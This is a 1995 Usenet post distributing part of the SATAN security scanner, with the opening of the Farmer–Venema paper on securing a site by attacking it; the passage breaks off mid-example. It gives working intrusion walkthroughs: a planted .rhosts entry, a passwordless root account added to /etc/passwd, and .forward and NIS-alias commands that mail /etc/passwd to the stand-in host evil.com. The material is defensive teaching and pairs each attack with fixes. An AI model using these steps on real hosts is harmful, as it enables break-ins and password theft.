Google Groups no longer supports new Usenet posts or subscriptions. Historical content remains viewable.

Dismiss

v47i125: satan - Security Administrator Tool for Analyzing Networks, Part01/15

204 views

Skip to first unread message

Wietse Venema

unread,

Apr 13, 1995, 3:00:00 AM4/13/95

Submitted-by: wswi...@wsbs06.win.tue.nl (Wietse Venema)
Posting-number: Volume 47, Issue 125
Archive-name: satan/part01
Environment: UNIX && HTML && Perl 5.0

SATAN (Security Administrator Tool for Analyzing Networks) tool.

SATAN is a tool to help systems administrators. It recognizes several
common networking-related security problems, and reports the problems
without actually exploiting them.

For each type or problem found, SATAN offers a tutorial that explains
the problem and what its impact could be. The tutorial also explains
what can be done about the problem: correct an error in a configuration
file, install a bugfix from the vendor, use other means to restrict
access, or simply disable service.

SATAN was written because we realized that computer systems are
becoming more and more dependent on the network, and at the same
becoming more and more vulnerable to attack via that same network.

The rationale for SATAN is given in a paper posted in December 1993
titled "Improving the Security of Your Site by Breaking Into it".
See below for availability.

SATAN collects information that is available to everyone on with access
to the network. With a properly-configured firewall in place, that
should be near-zero information for outsiders.

We have done some limited research with SATAN. Our finding is that on
networks with more than a few dozen systems, SATAN will inevitably find
problems. Here's the current problem list:

NFS file systems exported to arbitrary hosts
NFS file systems exported to unprivileged programs
NFS file systems exported via the portmapper
NIS password file access from arbitrary hosts
Old (i.e. before 8.6.10) sendmail versions
REXD access from arbitrary hosts
X server access control disabled
arbitrary files accessible via TFTP
remote shell access from arbitrary hosts
writable anonymous FTP home directory
unrestricted modem on the Internet
Old (before 2.4) versions of the wuarchive ftpd daemon

These are well-known problems. They have been subject of CERT, CIAC, or
other advisories, or are described extensively in practical security
handbooks. The problems have been exploited by the intruder community
for a long time.

We realize that SATAN is a two-edged sword - like many tools, it can be
used for good and for evil purposes. We also realize that intruders
(including wannabees) have much more capable (read intrusive) tools
than offered with SATAN. We have those tools, too, but giving them
away to the world at large is not the goal of the SATAN project.

Again, SATAN was written to improve Internet security. Don't put our
work to shame.

Wietse Venema / Dan Farmer
(sa...@fish.com)

Common Questions
================

A mail server has been set up that provides answers to common questions.
Send mail to majo...@wzv.win.tue.nl, with as body (not subject):

get satan mirror-sites
get satan release-plan
get satan description
get satan admin-guide-to-cracking.101

These will get you the list of sites where you can get SATAN via ftp or
http, the SATAN release plan, a brief description, and the December
1993 article titled "Improving the Security of Your Site by Breaking
Into it", which gives the rationale for creating SATAN.

You may send multiple requests in one message.

Availability:
============

SATAN is available on the following sites, in no particular order
(this list is still under construction):

and on ftp.win.tue.nl as /pub/security/satan-1.1.1.tar.Z

Besides email, the rationale paper for SATAN is also available via ftp
on ftp.win.tue.nl as /pub/security/admin-guide-to-cracking.101.Z.

#! /bin/sh
# This is a shell archive. Remove anything before this line, then feed it
# into a shell via "sh file" or similar. To overwrite existing files,
# type "sh file -c".
# Contents: satan-1.1.1 satan-1.1.1/bin satan-1.1.1/config
# satan-1.1.1/html satan-1.1.1/html/admin satan-1.1.1/html/data
# satan-1.1.1/html/docs
# satan-1.1.1/html/docs/admin_guide_to_cracking.html
# satan-1.1.1/html/reporting satan-1.1.1/html/running
# satan-1.1.1/html/tutorials satan-1.1.1/html/tutorials/first_time
# satan-1.1.1/html/tutorials/vulnerability satan-1.1.1/include
# satan-1.1.1/include/netinet satan-1.1.1/perl satan-1.1.1/perllib
# satan-1.1.1/rules satan-1.1.1/src satan-1.1.1/src/boot
# satan-1.1.1/src/fping satan-1.1.1/src/misc satan-1.1.1/src/nfs-chk
# satan-1.1.1/src/port_scan satan-1.1.1/src/rpcgen
# satan-1.1.1/src/yp-chk
# Wrapped by kent@ftp on Wed Apr 12 20:30:07 1995
PATH=/bin:/usr/bin:/usr/ucb:/usr/local/bin:/usr/lbin:$PATH ; export PATH
echo If this archive is complete, you will see the following message:
echo ' "shar: End of archive 1 (of 15)."'
if test ! -d 'satan-1.1.1' ; then
echo shar: Creating directory \"'satan-1.1.1'\"
mkdir 'satan-1.1.1'
fi
if test ! -d 'satan-1.1.1/bin' ; then
echo shar: Creating directory \"'satan-1.1.1/bin'\"
mkdir 'satan-1.1.1/bin'
fi
if test ! -d 'satan-1.1.1/config' ; then
echo shar: Creating directory \"'satan-1.1.1/config'\"
mkdir 'satan-1.1.1/config'
fi
if test ! -d 'satan-1.1.1/html' ; then
echo shar: Creating directory \"'satan-1.1.1/html'\"
mkdir 'satan-1.1.1/html'
fi
if test ! -d 'satan-1.1.1/html/admin' ; then
echo shar: Creating directory \"'satan-1.1.1/html/admin'\"
mkdir 'satan-1.1.1/html/admin'
fi
if test ! -d 'satan-1.1.1/html/data' ; then
echo shar: Creating directory \"'satan-1.1.1/html/data'\"
mkdir 'satan-1.1.1/html/data'
fi
if test ! -d 'satan-1.1.1/html/docs' ; then
echo shar: Creating directory \"'satan-1.1.1/html/docs'\"
mkdir 'satan-1.1.1/html/docs'
fi
if test -f 'satan-1.1.1/html/docs/admin_guide_to_cracking.html' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/docs/admin_guide_to_cracking.html'\"
else
echo shar: Extracting \"'satan-1.1.1/html/docs/admin_guide_to_cracking.html'\" $52520 characters$
sed "s/^X//" >'satan-1.1.1/html/docs/admin_guide_to_cracking.html' <<'END_OF_FILE'
X<HTML>
X<HEAD>
X<title>Improving the Security of Your Site by Breaking Into it</title>
X<LINK REV="made" HREF="mailto:sa...@fish.com">
X</HEAD>
X<BODY>
X<IMG SRC="../images/satan.gif" ALT="[SATAN IMAGE]">
X<H2>Improving the Security of Your Site by Breaking Into it</H2>
X<HR>
X<p>
X<pre>
X
X Dan Farmer Wietse Venema
X
X Vicious Fishes Eindhoven University of Technology
X 1685 Oak Street, #202 P.O. Box 513, 5600 MB
X San Francisco, CA 94117 Eindhoven, NL
X
X z...@fish.com wie...@wzv.win.tue.nl
X
X
XIntroduction
X------------
X
XEvery day, all over the world, computer networks and hosts are being
Xbroken into. The level of sophistication of these attacks varies
Xwidely; while it is generally believed that most break-ins succeed due
Xto weak passwords, there are still a large number of intrusions that use
Xmore advanced techniques to break in. Less is known about the latter
Xtypes of break-ins, because by their very nature they are much harder to
Xdetect.
X
X-----
X
XCERT. SRI. The Nic. NCSC. RSA. NASA. MIT. Uunet. Berkeley.
XPurdue. Sun. You name it, we've seen it broken into. Anything that is
Xon the Internet (and many that isn't) seems to be fairly easy game. Are
Xthese targets unusual? What happened?
X
XFade to...
X
XA young boy, with greasy blonde hair, sitting in a dark room. The room
Xis illuminated only by the luminescense of the C64's 40 character
Xscreen. Taking another long drag from his Benson and Hedges cigarette,
Xthe weary system cracker telnets to the next faceless ".mil" site on his
Xhit list. "guest -- guest", "root -- root", and "system -- manager" all
Xfail. No matter. He has all night... he pencils the host off of his
Xlist, and tiredly types in the next potential victim...
X
XThis seems to be the popular image of a system cracker. Young,
Xinexperienced, and possessing vast quantities of time to waste, to get
Xinto just one more system. However, there is a far more dangerous type
Xof system cracker out there. One who knows the ins and outs of the
Xlatest security auditing and cracking tools, who can modify them for
Xspecific attacks, and who can write his/her own programs. One who not
Xonly reads about the latest security holes, but also personally
Xdiscovers bugs and vulnerabilities. A deadly creature that can both
Xstrike poisonously and hide its tracks without a whisper or hint of a
Xtrail. The uebercracker is here.
X
X-----
X
XWhy "uebercracker"? The idea is stolen, obviously, from Nietzsche's
Xuebermensch, or, literally translated into English, "over man."
XNietzsche used the term not to refer to a comic book superman, but
Xinstead a man who had gone beyond the incompetence, pettiness, and
Xweakness of the everyday man. The uebercracker is therefore the system
Xcracker who has gone beyond simple cookbook methods of breaking into
Xsystems. An uebercracker is not usually motivated to perform random
Xacts of violence. Targets are not arbitrary -- there is a purpose,
Xwhether it be personal monetary gain, a hit and run raid for
Xinformation, or a challenge to strike a major or prestigious site or
Xnet.personality. An uebercracker is hard to detect, harder to stop, and
Xhardest to keep out of your site for good.
X
XOverview
X--------
X
XIn this paper we will take an unusual approach to system security.
XInstead of merely saying that something is a problem, we will look
Xthrough the eyes of a potential intruder, and show _why_ it is one. We
Xwill illustrate that even seemingly harmless network services can become
Xvaluable tools in the search for weak points of a system, even when
Xthese services are operating exactly as they are intended to.
X
XIn an effort to shed some light on how more advanced intrusions occur,
Xthis paper outlines various mechanisms that crackers have actually used
Xto obtain access to systems and, in addition, some techniques we either
Xsuspect intruders of using, or that we have used ourselves in tests or
Xin friendly/authorized environments.
X
XOur motivation for writing this paper is that system administrators are
Xoften unaware of the dangers presented by anything beyond the most
Xtrivial attacks. While it is widely known that the proper level of
Xprotection depends on what has to be protected, many sites appear to
Xlack the resources to assess what level of host and network security is
Xadequate. By showing what intruders can do to gain access to a remote
Xsite, we are trying to help system administrators to make _informed_
Xdecisions on how to secure their site -- or not. We will limit the
Xdiscussion to techniques that can give a remote intruder access to a
X(possibly non-interactive) shell process on a UNIX host. Once this is
Xachieved, the details of obtaining root privilege are beyond the scope
Xof this work -- we consider them too site-dependent and, in many cases,
Xtoo trivial to merit much discussion.
X
XWe want to stress that we will not merely run down a list of bugs or
Xsecurity holes -- there will always be new ones for a potential attacker
Xto exploit. The purpose of this paper is to try to get the reader to
Xlook at her or his system in a new way -- one that will hopefully afford
Xhim or her the opportunity to _understand_ how their system can be
Xcompromised, and how.
X
XWe would also like to reiterate to the reader that the purpose of this
Xpaper is to show you how to test the security of your own site, not how
Xto break into other people's systems. The intrusion techniques we
Xillustrate here will often leave traces in your system auditing logs --
Xit might be constructive to examine them after trying some of these
Xattacks out, to see what a real attack might look like. Certainly other
Xsites and system administrators will take a very dim view of your
Xactivities if you decide to use their hosts for security testing without
Xadvance authorization; indeed, it is quite possible that legal action
Xmay be pursued against you if they perceive it as an attack.
X
XThere are four main parts to the paper. The first part is the
Xintroduction and overview. The second part attempts to give the reader
Xa feel for what it is like to be an intruder and how to go from knowing
Xnothing about a system to compromising its security. This section goes
Xover actual techniques to gain information and entrance and covers basic
Xstrategies such as exploiting trust and abusing improperly configured
Xbasic network services (ftp, mail, tftp, etc.) It also discusses
Xslightly more advanced topics, such as NIS and NFS, as well as various
Xcommon bugs and configuration problems that are somewhat more OS or
Xsystem specific. Defensive strategies against each of the various
Xattacks are also covered here.
X
XThe third section deals with trust: how the security of one system
Xdepends on the integrity of other systems. Trust is the most complex
Xsubject in this paper, and for the sake of brevity we will limit the
Xdiscussion to clients in disguise.
X
XThe fourth section covers the basic steps that a system administrator
Xmay take to protect her or his system. Most of the methods presented
Xhere are merely common sense, but they are often ignored in practice --
Xone of our goals is to show just how dangerous it can be to ignore basic
Xsecurity practices.
X
XCase studies, pointers to security-related information, and software are
Xdescribed in the appendices at the end of the paper.
X
XWhile exploring the methods and strategies discussed in this paper we we
Xwrote SATAN (Security Analysis Tool for Auditing Networks.) Written in
Xshell, perl, expect and C, it examines a remote host or set of hosts and
Xgathers as much information as possible by remotely probing NIS, finger,
XNFS, ftp and tftp, rexd, and other services. This information includes
Xthe presence of various network information services as well as
Xpotential security flaws -- usually in the form of incorrectly setup or
Xconfigured network services, well-known bugs in system or network
Xutilities, or poor or ignorant policy decisions. It then can either
Xreport on this data or use an expert system to further investigate any
Xpotential security problems. While SATAN doesn't use all of the methods
Xthat we discuss in the paper, it has succeeded with ominous regularity
Xin finding serious holes in the security of Internet sites. It will be
Xposted and made available via anonymous ftp when completed; Appendix A
Xcovers its salient features.
X
XNote that it isn't possible to cover all possible methods of breaking
Xinto systems in a single paper. Indeed, we won't cover two of the most
Xeffective methods of breaking into hosts: social engineering and
Xpassword cracking. The latter method is so effective, however, that
Xseveral of the strategies presented here are geared towards acquiring
Xpassword files. In addition, while windowing systems (X, OpenWindows,
Xetc.) can provide a fertile ground for exploitation, we simply don't
Xknow many methods that are used to break into remote systems. Many
Xsystem crackers use non-bitmapped terminals which can prevent them from
Xusing some of the more interesting methods to exploit windowing systems
Xeffectively (although being able to monitor the victim's keyboard is
Xoften sufficient to capture passwords). Finally, while worms, viruses,
Xtrojan horses, and other malware are very interesting, they are not
Xcommon (on UNIX systems) and probably will use similar techniques to the
Xones we describe in this paper as individual parts to their attack
Xstrategy.
X
XGaining Information
X-------------------
X
XLet us assume that you are the head system administrator of Victim
XIncorporated's network of UNIX workstations. In an effort to secure
Xyour machines, you ask a friendly system administrator from a nearby
Xsite (evil.com) to give you an account on one of her machines so that
Xyou can look at your own system's security from the outside.
X
XWhat should you do? First, try to gather information about your
X(target) host. There is a wealth of network services to look at:
Xfinger, showmount, and rpcinfo are good starting points. But don't stop
Xthere -- you should also utilize DNS, whois, sendmail (smtp), ftp, uucp,
Xand as many other services as you can find. There are so many methods
Xand techniques that space precludes us from showing all of them, but we
Xwill try to show a cross-section of the most common and/or dangerous
Xstrategies that we have seen or have thought of. Ideally, you would
Xgather such information about all hosts on the subnet or area of attack
X-- information is power -- but for now we'll examine only our intended
Xtarget.
X
XTo start out, you look at what the ubiquitous finger command shows you
X(assume it is 6pm, Nov 6, 1993):
X
X victim % finger @victim.com
X [victim.com]
X Login Name TTY Idle When Where
X zen Dr. Fubar co 1d Wed 08:00 death.com
X
XGood! A single idle user -- it is likely that no one will notice if you
Xactually manage to break in.
X
XNow you try more tactics. As every finger devotee knows, fingering "@",
X"0", and "", as well as common names, such as root, bin, ftp, system,
Xguest, demo, manager, etc., can reveal interesting information. What
Xthat information is depends on the version of finger that your target is
Xrunning, but the most notable are account names, along with their home
Xdirectories and the host that they last logged in from.
X
XTo add to this information, you can use rusers (in particular with the
X-l flag) to get useful information on logged-in users.
X
XTrying these commands on victim.com reveals the following information,
Xpresented in a compressed tabular form to save space:
X
X Login Home-dir Shell Last login, from where
X ----- -------- ----- ----------------------
X root / /bin/sh Fri Nov 5 07:42 on ttyp1 from big.victim.com
X bin /bin Never logged in
X nobody / Tue Jun 15 08:57 on ttyp2 from server.victim.co
X daemon / Tue Mar 23 12:14 on ttyp0 from big.victim.com
X sync / /bin/sync Tue Mar 23 12:14 on ttyp0 from big.victim.com
X zen /home/zen /bin/bash On since Wed Nov 6 on ttyp3 from death.com
X sam /home/sam /bin/csh Wed Nov 5 05:33 on ttyp3 from evil.com
X guest /export/foo /bin/sh Never logged in
X ftp /home/ftp Never logged in
X
XBoth our experiments with SATAN and watching system crackers at work
Xhave proved to us that finger is one of the most dangerous services,
Xbecause it is so useful for investigating a potential target. However,
Xmuch of this information is useful only when used in conjunction with
Xother data.
X
X</pre>
X<a name="unrestricted-NFS-export">
X<pre>
X
XFor instance, running showmount on your target reveals:
X
X evil % showmount -e victim.com
X export list for victim.com:
X /export (everyone)
X /var (everyone)
X /usr easy
X /export/exec/kvm/sun4c.sunos.4.1.3 easy
X /export/root/easy easy
X /export/swap/easy easy
X
XNote that /export/foo is exported to the world; also note that this is
Xuser guest's home directory. Time for your first break-in! In this
Xcase, you'll mount the home directory of user "guest." Since you don't
Xhave a corresponding account on the local machine and since root cannot
Xmodify files on an NFS mounted filesystem, you create a "guest" account
Xin your local password file. As user guest you can put an .rhosts entry
Xin the remote guest home directory, which will allow you to login to the
Xtarget machine without having to supply a password.
X
X evil # mount victim.com:/export/foo /foo
X evil # cd /foo
X evil # ls -lag
X total 3
X 1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 .
X 1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 ..
X 1 drwx--x--x 9 10001 daemon 1024 Aug 3 15:49 guest
X evil # echo guest:x:10001:1:temporary breakin account:/: >> /etc/passwd
X evil # ls -lag
X total 3
X 1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 .
X 1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 ..
X 1 drwx--x--x 9 guest daemon 1024 Aug 3 15:49 guest
X evil # su guest
X evil % echo evil.com >> guest/.rhosts
X evil % rlogin victim.com
X Welcome to victim.com!
X victim %
X
XIf, instead of home directories, victim.com were exporting filesystems
Xwith user commands (say, /usr or /usr/local/bin), you could replace a
Xcommand with a trojan horse that executes any command of your choice.
XThe next user to execute that command would execute your program.
X
XWe suggest that filesystems be exported:
X
Xo Read/write only to specific, trusted clients.
Xo Read-only, where possible (data or programs can often be
X exported in this manner.)
X
X</pre>
X<a name="remote-shell-access">
X<pre>
X
XIf the target has a "+" wildcard in its /etc/hosts.equiv (the default in
Xvarious vendor's machines) or has the netgroups bug (CERT advisory
X91:12), any non-root user with a login name in the target's password
Xfile can rlogin to the target without a password. And since the user
X"bin" often owns key files and directories, your next attack is to try
Xto log in to the target host and modify the password file to let you
Xhave root access:
X
X evil % whoami
X bin
X evil % rsh victim.com csh -i
X Warning: no access to tty; thus no job control in this shell...
X victim % ls -ldg /etc
X drwxr-sr-x 8 bin staff 2048 Jul 24 18:02 /etc
X victim % cd /etc
X victim % mv passwd pw.old
X victim % (echo toor::0:1:instant root shell:/:/bin/sh; cat pw.old ) > passwd
X victim % ^D
X evil % rlogin victim.com -l toor
X Welcome to victim.com!
X victim #
X
XA few notes about the method used above; "rsh victim.com csh -i" is used
Xto initially get onto the system because it doesn't leave any traces in
Xthe wtmp or utmp system auditing files, making the rsh invisible for
Xfinger and who. The remote shell isn't attached to a pseudo-terminal,
Xhowever, so that screen-oriented programs such as pagers and editors
Xwill fail -- but it is very handy for brief exploration.
X
XThe COPS security auditing tool (see appendix D) will report key files
Xor directories that are writable to accounts other than the
Xsuperuser. If you run SunOS 4.x you can apply patch 100103 to fix most
Xfile permission problems. On many systems, rsh probes as shown above,
Xeven when successful, would remain completely unnoticed; the tcp wrapper
X(appendix D), which logs incoming connections, can help to expose such
Xactivities.
X
X----
X
X</pre>
X<a name="writable-ftp">
X<pre>
X
XWhat now? Have you uncovered all the holes on your target system? Not
Xby a long shot. Going back to the finger results on your target, you
Xnotice that it has an "ftp" account, which usually means that anonymous
Xftp is enabled. Anonymous ftp can be an easy way to get access, as it
Xis often misconfigured. For example, the target may have a complete
Xcopy of the /etc/passwd file in the anonymous ftp ~ftp/etc directory
Xinstead of a stripped down version. In this example, thfinger ough, you see
Xthat the latter doesn't seem to be true (how can you tell without
Xactually examining the file?) However, the home directory of ftp on
Xvictim.com is writable. This allows you to remotely execute a command
X-- in this case, mailing the password file back to yourself -- by the
Xsimple method of creating a .forward file that executes a command when
Xmail is sent to the ftp account. This is the same mechanism of piping
Xmail to a program that the "vacation" program uses to automatically
Xreply to mail messages.
X
X evil % cat forward_sucker_file
X "|/bin/mail z...@evil.com < /etc/passwd"
X
X evil % ftp victim.com
X Connected to victim.com
X 220 victim FTP server ready.
X Name (victim.com:zen): ftp
X 331 Guest login ok, send ident as password.
X Password:
X 230 Guest login ok, access restrictions apply.
X ftp> ls -lga
X 200 PORT command successful.
X 150 ASCII data connection for /bin/ls (192.192.192.1,1129) (0 bytes).
X total 5
X drwxr-xr-x 4 101 1 512 Jun 20 1991 .
X drwxr-xr-x 4 101 1 512 Jun 20 1991 ..
X drwxr-xr-x 2 0 1 512 Jun 20 1991 bin
X drwxr-xr-x 2 0 1 512 Jun 20 1991 etc
X drwxr-xr-x 3 101 1 512 Aug 22 1991 pub
X 226 ASCII Transfer complete.
X 242 bytes received in 0.066 seconds (3.6 Kbytes/s)
X ftp> put forward_sucker_file .forward
X 43 bytes sent in 0.0015 seconds (28 Kbytes/s)
X ftp> quit
X evil % echo test | mail f...@victim.com
X
XNow you simply wait for the password file to be sent back to you.
X
XThe security auditing tool COPS will check your anonymous ftp setup; see
Xthe man page for ftpd, the documentation/code for COPS, or CERT advisory
X93:10 for information on how to set up anonymous ftp correctly.
XVulnerabilities in ftp are often a matter of incorrect ownership or
Xpermissions of key files or directories. At the very least, make sure
Xthat ~ftp and all "system" directories and files below ~ftp are owned by
Xroot and are not writable by any user.
X
XWhile looking at ftp, you can check for an older bug that was once
Xwidely exploited:
X
X % ftp -n
X ftp> open victim.com
X Connected to victim.com
X 220 victim.com FTP server ready.
X ftp> quote user ftp
X 331 Guest login ok, send ident as password.
X ftp> quote cwd ~root
X 530 Please login with USER and PASS.
X ftp> quote pass ftp
X 230 Guest login ok, access restrictions apply.
X ftp> ls -al / (or whatever)
X
XIf this works, you now are logged in as root, and able to modify the
Xpassword file, or whatever you desire. If your system exhibits this
Xbug, you should definitely get an update to your ftpd daemon, either
Xfrom your vendor or (via anon ftp) from ftp.uu.net.
X
XThe wuarchive ftpd, a popular replacement ftp daemon put out by the
XWashington University in Saint Louis, had almost the same problem. If
Xyour wuarchive ftpd pre-dates April 8, 1993, you should replace it by a
Xmore recent version.
X
X
X</pre>
X<a name="tftp">
X<pre>
X
XFinally, there is a program vaguely similar to ftp -- tftp, or the
Xtrivial file transfer program. This daemon doesn't require any password
Xfor authentication; if a host provides tftp without restricting the
Xaccess (usually via some secure flag set in the inetd.conf file), an
Xattacker can read and write files anywhere on the system. In the
Xexample, you get the remote password file and place it in your local
X/tmp directory:
X
X evil % tftp
X tftp> connect victim.com
X tftp> get /etc/passwd /tmp/passwd.victim
X tftp> quit
X
XFor security's sake, tftp should not be run; if tftp is necessary, use
Xthe secure option/flag to restrict access to a directory that has no
Xvaluable information, or run it under the control of a chroot wrapper
Xprogram.
X
X----
X
XIf none of the previous methods have worked, it is time to go on to more
Xdrastic measures. You have a friend in rpcinfo, another very handy
Xprogram, sometimes even more useful than finger. Many hosts run RPC
Xservices that can be exploited; rpcinfo can talk to the portmapper and
Xshow you the way. It can tell you if the host is running NIS, if it is
Xa NIS server or slave, if a diskless workstation is around, if it is
Xrunning NFS, any of the info services (rusersd, rstatd, etc.), or any
Xother unusual programs (auditing or security related). For instance,
Xgoing back to our sample target:
X
X evil % rpcinfo -p victim.com [output trimmed for brevity's sake]
X program vers proto port
X 100004 2 tcp 673 ypserv
X 100005 1 udp 721 mountd
X 100003 2 udp 2049 nfs
X 100026 1 udp 733 bootparam
X 100017 1 tcp 1274 rexd
X
X</pre>
X<a name="nis-passwords">
X<pre>
X
XIn this case, you can see several significant facts about our target;
Xfirst of which is that it is an NIS server. It is perhaps not widely
Xknown, but once you know the NIS domainname of a server, you can get any
Xof its NIS maps by a simple rpc query, even when you are outside the
Xsubnet served by the NIS server (for example, using the YPX program that
Xcan be found in the comp.sources.misc archives on ftp.uu.net). In
Xaddition, very much like easily guessed passwords, many systems use
Xeasily guessed NIS domainnames. Trying to guess the NIS domainname is
Xoften very fruitful. Good candidates are the fully and partially
Xqualified hostname (e.g. "victim" and "victim.com"), the organization
Xname, netgroup names in "showmount" output, and so on. If you wanted to
Xguess that the domainname was "victim", you could type:
X
X evil % ypwhich -d victim victim.com
X Domain victim not bound.
X
XThis was an unsuccessful attempt; if you had guessed correctly it would
Xhave returned with the host name of victim.com's NIS server. However,
Xnote from the NFS section that victim.com is exporting the "/var"
Xdirectory to the world. All that is needed is to mount this directory
Xand look in the "yp" subdirectory -- among other things you will see
Xanother subdirectory that contains the domainname of the target.
X
X evil # mount victim.com:/var /foo
X evil # cd /foo
X evil # /bin/ls -alg /foo/yp
X total 17
X 1 drwxr-sr-x 4 root staff 512 Jul 12 14:22 .
X 1 drwxr-sr-x 11 root staff 512 Jun 29 10:54 ..
X 11 -rwxr-xr-x 1 root staff 10993 Apr 22 11:56 Makefile
X 1 drwxr-sr-x 2 root staff 512 Apr 22 11:20 binding
X 2 drwxr-sr-x 2 root staff 1536 Jul 12 14:22 foo_bar
X [...]
X
XIn this case, "foo_bar" is the NIS domain name.
X
XIn addition, the NIS maps often contain a good list of user/employee
Xnames as well as internal host lists, not to mention passwords for
Xcracking.
X
XAppendix C details the results of a case study on NIS password files.
X
X----
X
X</pre>
X<a name="rexd">
X<pre>
X
XYou note that the rpcinfo output also showed that victim.com runs rexd.
XLike the rsh daemon, rexd processes requests of the form "please execute
Xthis command as that user". Unlike rshd, however, rexd does not care if
Xthe client host is in the hosts.equiv or .rhost files. Normally the rexd
Xclient program is the "on" command, but it only takes a short C program
Xto send arbitrary client host and userid information to the rexd server;
Xrexd will happily execute the command. For these reasons, running rexd
Xis similar to having no passwords at all: all security is in the client,
Xnot in the server where it should be. Rexd security can be improved
Xsomewhat by using secure RPC.
X
X----
X
XWhile looking at the output from rpcinfo, you observe that victim.com
Xalso seems to be a server for diskless workstations. This is evidenced
Xby the presence of the bootparam service, which provides information to
Xthe diskless clients for booting. If you ask nicely, using
XBOOTPARAMPROC_WHOAMI and provide the address of a client, you can get
Xits NIS domainname. This can be very useful when combined with the fact
Xthat you can get arbitrary NIS maps (such as the password file) when you
Xknow the NIS domainname. Here is a sample code snippet to do just that
X(bootparam is part of SATAN.)
X
X char *server;
X struct bp_whoami_arg arg; /* query */
X struct bp_whoami_res res; /* reply */
X
X /* initializations omitted... */
X
X callrpc(server, BOOTPARAMPROG, BOOTPARAMVERS, BOOTPARAMPROC_WHOAMI,
X xdr_bp_whoami_arg, &arg, xdr_bp_whoami_res, &res);
X
X printf("%s has nisdomain %s\n", server, res.domain_name);
X
XThe showmount output indicated that "easy" is a diskless client of
Xvictim.com, so we use its client address in the BOOTPARAMPROC_WHOAMI
Xquery:
X
X evil % bootparam victim.com easy.victim.com
X victim.com has nisdomain foo_bar
X
X----
X
XNIS masters control the mail aliases for the NIS domain in question.
XJust like local mail alias files, you can create a mail alias that will
Xexecute commands when mail is sent to it (a once popular example of this
Xis the "decode" alias which uudecodes mail files sent to it.) For
Xinstance, here you create an alias "foo", which mails the password file
Xback to evil.com by simply mailing any message to it:
X
X nis-master # echo 'foo: "| mail z...@evil.com < /etc/passwd "' >> /etc/aliases
X nis-master # cd /var/yp
X nis-master # make aliases
X nis-master # echo test | mail -v f...@victim.com
X
XHopefully attackers won't have control of your NIS master host, but even
Xmore hopefully the lesson is clear -- NIS is normally insecure, but if
Xan attacker has control of your NIS master, then s/he effectively has
Xcontrol of the client hosts (e.g. can execute arbitrary commands).
X
XThere aren't many effective defenses against NIS attacks; it is an
Xinsecure service that has almost no authentication between clients and
Xservers. To make things worse, it seems fairly clear that arbitrary
Xmaps can be forced onto even master servers (e.g., it is possible to
Xtreat an NIS server as a client). This, obviously, would subvert the
Xentire schema. If it is absolutely necessary to use NIS, choosing a
Xhard to guess domainname can help slightly, but if you run diskless
Xclients that are exposed to potential attackers then it is trivial for
Xan attacker to defeat this simple step by using the bootparam trick to
Xget the domainname. If NIS is used to propagate the password maps, then
Xshadow passwords do not give additional protection because the shadow
Xmap is still accessible to any attacker that has root on an attacking
Xhost. Better is to use NIS as little as possible, or to at least
Xrealize that the maps can be subject to perusal by potentially hostile
Xforces.
X
XSecure RPC goes a long way to diminish the threat, but it has its own
Xproblems, primarily in that it is difficult to administer, but also in
Xthat the cryptographic methods used within are not very strong. It has
Xbeen rumored that NIS+, Sun's new network information service, fixes
Xsome of these problems, but until now it has been limited to running on
XSuns, and thus far has not lived up to the promise of the design.
XFinally, using packet filtering (at the very least port 111) or
Xsecurelib (see appendix D), or, for Suns, applying Sun patch 100482-02
Xall can help.
X
X----
X
X</pre>
X<a name="x-access">
X<pre>
X
XThe portmapper only knows about RPC services. Other network services
Xcan be located with a brute-force method that connects to all network
Xports. Many network utilities and windowing systems listen to specific
Xports (e.g. sendmail is on port 25, telnet is on port 23, X windows is
Xusually on port 6000, etc.) SATAN includes a program that scans the
Xports of a remote hosts and reports on its findings; if you run it
Xagainst our target, you see:
X
X evil % tcpmap victim.com
X Mapping 128.128.128.1
X port 21: ftp
X port 23: telnet
X port 25: smtp
X port 37: time
X port 79: finger
X port 512: exec
X port 513: login
X port 514: shell
X port 515: printer
X port 6000: (X)
X
XThis suggests that victim.com is running X windows. If not protected
Xproperly (via the magic cookie or xhost mechanisms), window displays can
Xbe captured or watched, user keystrokes may be stolen, programs executed
Xremotely, etc. Also, if the target is running X and accepts a telnet to
Xport 6000, that can be used for a denial of service attack, as the
Xtarget's windowing system will often "freeze up" for a short period of
Xtime. One method to determine the vulnerability of an X server is to
Xconnect to it via the XOpenDisplay() function; if the function returns
XNULL then you cannot access the victim's display (opendisplay is part of
XSATAN):
X
X char *hostname;
X
X if (XOpenDisplay(hostname) == NULL) {
X printf("Cannot open display: %s\n", hostname);
X } else {
X printf("Can open display: %s\n", hostname);
X }
X
X evil % opendisplay victim.com:0
X Cannot open display: victim.com:0
X
XX terminals, though much less powerful than a complete UNIX system, can
Xhave their own security problems. Many X terminals permit unrestricted
Xrsh access, allowing you to start X client programs in the victim's
Xterminal with the output appearing on your own screen:
X
X evil % xhost +xvictim.victim.com
X evil % rsh xvictim.victim.com telnet victim.com -display evil.com
X
XIn any case, give as much thought to your window security as your
Xfilesystem and network utilities, for it can compromise your system as
Xsurely as a "+" in your hosts.equiv or a passwordless (root) account.
X
X----
X
X</pre>
X<a name="sendmail">
X<pre>
X
XNext, you examine sendmail. Sendmail is a very complex program that has
Xa long history of security problems, including the infamous "wiz"
Xcommand (hopefully long since disabled on all machines). You can often
Xdetermine the OS, sometimes down to the version number, of the target,
Xby looking at the version number returned by sendmail. This, in turn,
Xcan give you hints as to how vulnerable it might be to any of the
Xnumerous bugs. In addition, you can see if they run the "decode" alias,
Xwhich has its own set of problems:
X
X evil % telnet victim.com 25
X connecting to host victim.com (128.128.128.1.), port 25
X connection open
X 220 victim.com Sendmail Sendmail 5.55/victim ready at Fri, 6 Nov 93 18:00 PDT
X expn decode
X 250 <"|/usr/bin/uudecode">
X quit
X
XRunning the "decode" alias is a security risk -- it allows potential
Xattackers to overwrite any file that is writable by the owner of that
Xalias -- often daemon, but potentially any user. Consider this piece of
Xmail -- this will place "evil.com" in user zen's .rhosts file if it is
Xwritable:
X
X evil % echo "evil.com" | uuencode /home/zen/.rhosts | mail dec...@victim.com
X
XIf no home directories are known or writable, an interesting variation
Xof this is to create a bogus /etc/aliases.pag file that contains an
Xalias with a command you wish to execute on your target. This may work
Xsince on many systems the aliases.pag and aliases.dir files, which
Xcontrol the system's mail aliases, are writable to the world.
X
X evil % cat decode
